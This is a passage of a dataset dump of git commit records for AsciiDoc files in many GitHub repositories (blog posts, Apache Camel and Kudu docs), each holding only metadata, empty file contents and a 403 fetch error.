2016-03-07-Comparer-des-dossiers-Node-J-S.adoc","repos":"flavienliger\/flavienliger.github.io,flavienliger\/flavienliger.github.io,flavienliger\/flavienliger.github.io,flavienliger\/flavienliger.github.io","old_file":"_posts\/2016-03-07-Comparer-des-dossiers-Node-J-S.adoc","new_file":"_posts\/2016-03-07-Comparer-des-dossiers-Node-J-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flavienliger\/flavienliger.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3570519b200a0ffbd713798bc8aabd6f36ed3b7","subject":"[docs] Add \"one client only\" best practice for kudu-spark","message":"[docs] Add \"one client only\" best practice for kudu-spark\n\nChange-Id: Ibaf369315b8627674ba64e6418d153568ded6fe8\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/11409\nTested-by: Will 
Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu","old_file":"docs\/developing.adoc","new_file":"docs\/developing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ce47529dacd7d1d85916b5d58d5679f762f38448","subject":"Add documentation","message":"Add documentation\n","repos":"laosdirg\/base,laosdirg\/base,laosdirg\/base","old_file":"docs\/docker.asciidoc","new_file":"docs\/docker.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/laosdirg\/base.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de71ce2ffc5cb156981fd545a7056e189e341e1d","subject":"Update 2017-01-20-notification-Google-Apps-Script.adoc","message":"Update 2017-01-20-notification-Google-Apps-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-20-notification-Google-Apps-Script.adoc","new_file":"_posts\/2017-01-20-notification-Google-Apps-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be1b41747dcb4881102b5bc24b3e0727f00d50a3","subject":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","message":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc04a0139db0af1c58c754e05abb1bae403e96ea","subject":"Update 2016-04-04-Desde-afuera.adoc","message":"Update 2016-04-04-Desde-afuera.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Desde-afuera.adoc","new_file":"_posts\/2016-04-04-Desde-afuera.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c82005601a2fbb48d5c9b7c44f63fe21444158e","subject":"fixed swarm mode inacurracies and added tutorial to use docker service create","message":"fixed swarm mode inacurracies and added tutorial to use docker service 
create\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"982daeb3fa6c710fef130b0b62d55f0da1536f57","subject":"y2b create post Black Friday in Canada!","message":"y2b create post Black Friday in Canada!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-25-Black-Friday-in-Canada.adoc","new_file":"_posts\/2011-11-25-Black-Friday-in-Canada.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f37fc21a082d30ad0631bd071fde86ddce3f6ffa","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e391c49e3561c215f3a8bec9bbd43e651e38e69","subject":"Update 2016-02-15-This-is-my-first-post.adoc","message":"Update 2016-02-15-This-is-my-first-post.adoc","repos":"hitamutable\/hitamutable.github.io,hitamutable\/hitamutable.github.io,hitamutable\/hitamutable.github.io,hitamutable\/hitamutable.github.io","old_file":"_posts\/2016-02-15-This-is-my-first-post.adoc","new_file":"_posts\/2016-02-15-This-is-my-first-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hitamutable\/hitamutable.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb03c9874ec3ea2aa030dee887b841d7112686d2","subject":"Update 2016-04-12-Codificacion-de-datos.adoc","message":"Update 2016-04-12-Codificacion-de-datos.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-12-Codificacion-de-datos.adoc","new_file":"_posts\/2016-04-12-Codificacion-de-datos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf72339cfcebd5ea4aaad7811ca406aac14c8f39","subject":"Added more references","message":"Added more references\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"243930e40277c7fc22f98a02e7236bac86502311","subject":"Add quote markup views","message":"Add quote markup views\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-quoteMarkupViews.adoc","new_file":"src\/main\/docs\/common-quoteMarkupViews.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8f565d615ad22cbfa0a029fad48b6e454c7ddeb8","subject":"Create do-always-respond-fil.adoc","message":"Create do-always-respond-fil.adoc\n\nFilipino translation for do-always-respond.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-always-respond-fil.adoc","new_file":"src\/do\/do-always-respond-fil.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a9eb089075db782d6204a73d83a9f30ea797201","subject":"CAMEL-13027 - Added docs","message":"CAMEL-13027 - Added docs\n","repos":"kevinearls\/camel,objectiser\/camel,pmoerenhout\/camel,DariusX\/camel,adessaigne\/camel,tadayosi\/camel,Fabryprog\/camel,punkhorn\/camel-upstream,christophd\/camel,alvinkwekel\/camel,christophd\/camel,gnodet\/camel,nicolaferraro\/camel,gnodet\/camel,cunningt\/camel,alvinkwekel\/camel,tadayosi\/camel,mcollovati\/camel,tadayosi\/camel,pmoerenhout\/camel,cunningt\/camel,CodeSmell\/camel,cunningt\/camel,Fabryprog\/camel,adessaigne\/camel,apache\/camel,punkhorn\/camel-upstream,apache\/camel,pax95\/camel,tdiesler\/camel,tadayosi\/camel,gnodet\/camel,christophd\/camel,kevinearls\/camel,nicolaferraro\/camel,kevinearls\/camel,ullgren\/camel,tdiesler\/camel,alvinkwekel\/camel,zregvart\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,tdiesler\/camel,davidkarlsen\/camel,kevinearls\/camel,nikhilvibhav\/camel,ullgren\/camel,kevinearls\/camel,ullgren\/camel,apache\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,mcollovati\/camel,adessaigne\/camel,christophd\/camel,adessaigne\/camel,pmoerenhout\/camel,DariusX\/camel,zregvart\/camel,davidkarlsen\/camel,christophd\/camel,pmoerenhout\/camel,pax95\/camel,nicolaferraro\/camel,gnodet\/camel,cunningt\/camel,cunningt\/camel,pmoerenhout\/camel,tdiesler\/camel,nikhilvibhav\/camel,gnodet\/camel,Fabryprog\/camel,ullgren\/camel,pax95\/camel,tadayosi\/camel,mcollovati\/camel,tdiesler\/camel,zregvart\/camel,punkhorn\/camel-upstream,DariusX\/camel,nicolaferraro\/camel,pax95\/camel,objectiser\/camel,zregvart\/camel,davidkarlsen\/camel,nikhilvibhav\/camel,cunningt\/camel,adessaigne\/camel,objectiser\/camel,Fabryprog\/camel,CodeSmell\/camel,christophd\/camel,apache\/camel,pax95\/camel,tadayosi\/camel,CodeSmell\/camel,kevinearls\/camel,mcollovati\/camel,objectiser\/camel,apache\/camel,pax95\/camel,adessaigne\/camel,tdiesler\/camel,DariusX\/camel,davidkarlsen\/camel,apache\/camel,pmoerenhout\/camel","old_file":"components\/camel-aws\/src\/main\/docs\/aws-eks-component.adoc","new_file":"components\/camel-aws\/src\/main\/docs\/aws-eks-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"95b0b30267d64255a524b3160941928cd74da353","subject":"Update 
Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6e6b26b1109c3c2aa1316dcdb136fcfc9230329","subject":"CL: Add reading\/slurping file","message":"CL: Add reading\/slurping file\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"e0c7212ac10e9917696499aad18e6807ba548657","subject":"Update 2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b47a92dcc013b915037cd63703305a4dce44f39","subject":"Update 2016-04-05-Local-File-Inclusion.adoc","message":"Update 2016-04-05-Local-File-Inclusion.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-Local-File-Inclusion.adoc","new_file":"_posts\/2016-04-05-Local-File-Inclusion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fffc149d79604a6708e8489a6db978b2bf678962","subject":"Update 2016-11-05-Saturday-Morning.adoc","message":"Update 2016-11-05-Saturday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Saturday-Morning.adoc","new_file":"_posts\/2016-11-05-Saturday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"335562294bc7feb2f38d69fbfb6d3ce343302c39","subject":"y2b create post Giveaway: Google Edition HTC One or Galaxy S4!","message":"y2b create post Giveaway: Google Edition HTC One or Galaxy 
S4!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-07-18-Giveaway-Google-Edition-HTC-One-or-Galaxy-S4.adoc","new_file":"_posts\/2013-07-18-Giveaway-Google-Edition-HTC-One-or-Galaxy-S4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb7a0aef3b62e8cefa1e6a30db9254b6ef52f0b3","subject":"y2b create post This Trick Lets YouTube Play In The Background!","message":"y2b create post This Trick Lets YouTube Play In The Background!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-07-This-Trick-Lets-YouTube-Play-In-The-Background.adoc","new_file":"_posts\/2016-08-07-This-Trick-Lets-YouTube-Play-In-The-Background.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0ee9f5bcbc7e42de36e72c472ad77153e735b6d","subject":"Initial readme file","message":"Initial readme file\n","repos":"JacobAae\/spock-workshop","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JacobAae\/spock-workshop.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"ce6fd4d9bf095226fab8ea2690ce1c94b542b90f","subject":"CAMEL-11497 - add from-eip by manually formatting adoc which is taken by cxf-web export","message":"CAMEL-11497 - add from-eip by manually formatting adoc which is taken by cxf-web 
export\n","repos":"tdiesler\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,punkhorn\/camel-upstream,DariusX\/camel,cunningt\/camel,nicolaferraro\/camel,gnodet\/camel,adessaigne\/camel,christophd\/camel,jonmcewen\/camel,snurmine\/camel,jamesnetherton\/camel,davidkarlsen\/camel,objectiser\/camel,onders86\/camel,nikhilvibhav\/camel,onders86\/camel,jonmcewen\/camel,dmvolod\/camel,jamesnetherton\/camel,christophd\/camel,jonmcewen\/camel,dmvolod\/camel,anoordover\/camel,tadayosi\/camel,alvinkwekel\/camel,snurmine\/camel,CodeSmell\/camel,curso007\/camel,jamesnetherton\/camel,tadayosi\/camel,sverkera\/camel,pax95\/camel,curso007\/camel,curso007\/camel,rmarting\/camel,anoordover\/camel,DariusX\/camel,zregvart\/camel,nicolaferraro\/camel,mcollovati\/camel,apache\/camel,pax95\/camel,onders86\/camel,davidkarlsen\/camel,gautric\/camel,kevinearls\/camel,gnodet\/camel,zregvart\/camel,alvinkwekel\/camel,pmoerenhout\/camel,tadayosi\/camel,nikhilvibhav\/camel,akhettar\/camel,pmoerenhout\/camel,rmarting\/camel,pax95\/camel,ullgren\/camel,davidkarlsen\/camel,nicolaferraro\/camel,kevinearls\/camel,dmvolod\/camel,Fabryprog\/camel,adessaigne\/camel,mcollovati\/camel,gnodet\/camel,curso007\/camel,sverkera\/camel,jonmcewen\/camel,anoordover\/camel,adessaigne\/camel,akhettar\/camel,CodeSmell\/camel,gautric\/camel,anoordover\/camel,objectiser\/camel,punkhorn\/camel-upstream,punkhorn\/camel-upstream,akhettar\/camel,snurmine\/camel,zregvart\/camel,cunningt\/camel,jonmcewen\/camel,cunningt\/camel,sverkera\/camel,adessaigne\/camel,kevinearls\/camel,akhettar\/camel,anoordover\/camel,mcollovati\/camel,nikhilvibhav\/camel,dmvolod\/camel,snurmine\/camel,apache\/camel,Fabryprog\/camel,christophd\/camel,Fabryprog\/camel,gnodet\/camel,tdiesler\/camel,pmoerenhout\/camel,akhettar\/camel,christophd\/camel,pmoerenhout\/camel,Fabryprog\/camel,kevinearls\/camel,dmvolod\/camel,apache\/camel,apache\/camel,CodeSmell\/camel,gautric\/camel,pax95\/camel,ullgren\/camel,dmvolod\/camel,CodeSmell\/camel,snurmine\/camel,jamesnetherton\/camel,christophd\/camel,jamesnetherton\/camel,DariusX\/camel,ullgren\/camel,apache\/camel,kevinearls\/camel,tdiesler\/camel,tadayosi\/camel,mcollovati\/camel,cunningt\/camel,alvinkwekel\/camel,adessaigne\/camel,onders86\/camel,pax95\/camel,pmoerenhout\/camel,tadayosi\/camel,alvinkwekel\/camel,objectiser\/camel,rmarting\/camel,nikhilvibhav\/camel,gnodet\/camel,nicolaferraro\/camel,gautric\/camel,tdiesler\/camel,cunningt\/camel,gautric\/camel,sverkera\/camel,onders86\/camel,sverkera\/camel,jamesnetherton\/camel,objectiser\/camel,rmarting\/camel,sverkera\/camel,akhettar\/camel,cunningt\/camel,adessaigne\/camel,kevinearls\/camel,rmarting\/camel,rmarting\/camel,anoordover\/camel,jonmcewen\/camel,zregvart\/camel,ullgren\/camel,onders86\/camel,pax95\/camel,curso007\/camel,tdiesler\/camel,pmoerenhout\/camel,snurmine\/camel,curso007\/camel,gautric\/camel,christophd\/camel,apache\/camel,tdiesler\/camel,DariusX\/camel,tadayosi\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/from-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/from-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4462484296c83324d1f67e6225dea85caab494d4","subject":"Update 2015-09-21-MasterCard-Moments-Priceless-Cities.adoc","message":"Update 
2015-09-21-MasterCard-Moments-Priceless-Cities.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-09-21-MasterCard-Moments-Priceless-Cities.adoc","new_file":"_posts\/2015-09-21-MasterCard-Moments-Priceless-Cities.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f919266ae650d9b87944659eb4714a0116422ff6","subject":"Update 2018-05-07-try-gas-with-slack.adoc","message":"Update 2018-05-07-try-gas-with-slack.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-07-try-gas-with-slack.adoc","new_file":"_posts\/2018-05-07-try-gas-with-slack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd83a315fd439d1b1a02f10f461d66734359207f","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3755e8144ac239a7c121f7686d7cb655bf7f0fb6","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f731a01f5e451e7b99a43181a053d6d68d9d7381","subject":"Update 2017-06-22-Your-Blog-title.adoc","message":"Update 2017-06-22-Your-Blog-title.adoc","repos":"icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io","old_file":"_posts\/2017-06-22-Your-Blog-title.adoc","new_file":"_posts\/2017-06-22-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/icthieves\/icthieves.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a01fa62baf83eafb1db77ddce312bd80b25050e","subject":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","message":"Update 
2016-03-31-Mensajes-ocultos-parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fff6d5b33acf7492dbe28299bbcaff97021b45b2","subject":"Update 2019-01-31-Mon-premier-article-test.adoc","message":"Update 2019-01-31-Mon-premier-article-test.adoc","repos":"pamasse\/pamasse.github.io,pamasse\/pamasse.github.io,pamasse\/pamasse.github.io,pamasse\/pamasse.github.io","old_file":"_posts\/2019-01-31-Mon-premier-article-test.adoc","new_file":"_posts\/2019-01-31-Mon-premier-article-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pamasse\/pamasse.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ed521cd6efd07edf226ea73a9832bb6e5363ff4","subject":"add glossary of LD2 terminology","message":"add glossary of LD2 terminology\n","repos":"Drakojin\/livingdoc2,pkleimann\/livingdoc,pkleimann\/livingdoc2,LivingDoc\/livingdoc,pkleimann\/livingdoc,pkleimann\/livingdoc,pkleimann\/livingdoc2,testIT-LivingDoc\/livingdoc2,bitterblue\/livingdoc2,bitterblue\/livingdoc2,Drakojin\/livingdoc2,LivingDoc\/livingdoc,LivingDoc\/livingdoc,testIT-LivingDoc\/livingdoc2,Drakojin\/livingdoc2,bitterblue\/livingdoc2","old_file":"doc\/glossary.adoc","new_file":"doc\/glossary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitterblue\/livingdoc2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1109ff3bdc04cfb708b5c49300c2d3b7deeac596","subject":"Update 2016-12-08-My-Development-Environment-Setup.adoc","message":"Update 2016-12-08-My-Development-Environment-Setup.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-12-08-My-Development-Environment-Setup.adoc","new_file":"_posts\/2016-12-08-My-Development-Environment-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca86bedf27b179545af14c5b94cc188599a0968d","subject":"y2b create post The Fidget Spinner Phone Is Real...","message":"y2b create post The Fidget Spinner Phone Is Real...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-13-The-Fidget-Spinner-Phone-Is-Real.adoc","new_file":"_posts\/2017-10-13-The-Fidget-Spinner-Phone-Is-Real.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b568744979e9deb1151fffed1ad63dc02f1f3806","subject":"y2b create post The Best Headphones That Money Can Buy...","message":"y2b create post The Best Headphones That Money Can 
Buy...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-13-TheBestHeadphonesThatMoneyCanBuy.adoc","new_file":"_posts\/2018-01-13-TheBestHeadphonesThatMoneyCanBuy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55c809d3cc763d9145c51ed1abba16dbfa68e14e","subject":"Release announcement for BTM 0.6.0.Final","message":"Release announcement for BTM 0.6.0.Final\n","repos":"tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/11\/30\/hawkular-btm-0-6-0-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/11\/30\/hawkular-btm-0-6-0-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"621bbce4bb63744095fd516f6d46482b8ca2538a","subject":"DBZ-361 Adding note on provided Compose files","message":"DBZ-361 Adding note on provided Compose files\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"docs\/tutorial.asciidoc","new_file":"docs\/tutorial.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 